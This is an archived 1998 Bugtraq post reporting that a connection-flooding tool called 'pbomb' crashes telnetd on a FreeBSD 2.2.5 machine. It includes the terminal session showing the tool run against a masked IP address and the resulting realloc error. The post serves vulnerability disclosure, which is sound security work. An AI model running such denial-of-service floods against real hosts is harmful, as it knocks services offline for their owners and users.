pbomb'ing SSH on a FreeBSD box.

From: Jeff Johnson (trnat_private)
Date: Thu Jan 15 1998 - 20:29:14 PST

  • Next message: dichro-bugtraqat_private: "Re: GCC 2.7.? /tmp files"

    Ok, I did some testing on an OS other than Linux, this time a FreeBSD 2.2.5
    [~]$ telnet 24.xxx.xx.xxx
    Trying 24.xxx.xx.xxx...
    Connected to 24.xxx.xx.xxx.
    Escape character is '^]'.
    FreeBSD (bsd.vnc.xxxxxxxx.xx.xx) (ttyp2)
    ^]^C - Connection closed.
    [~]$ pbomb 24.xxx.xx.xxx
    250 connects counted.
    250 connects counted.
    109 connects counted.
    [switch windows]
    Guess what?  It isn't working, and I'm sure trying to do anything at console
    gives the same error:
    Trying 24.xxx.xx.xxx...
    Connected to 24.xxx.xx.xxx.
    Escape character is '^]'.
    telnetd in realloc(): warning: junk pointer, too low to make sense.
    Connection closed by foreign host.
    ---  Oh, I was told to add this or die:
    "<thoreau/#linuxwarez> TrN: Can I get credit in bugtraq for helping with the
    tests and letting my machines crash?
    <TrN!*> thoreau: sure. :)"
    trnat_private - [LwZ] - http://www.flinet.com/~trn
    I poured Spot remover on my dog. Now he's gone. *sniff*

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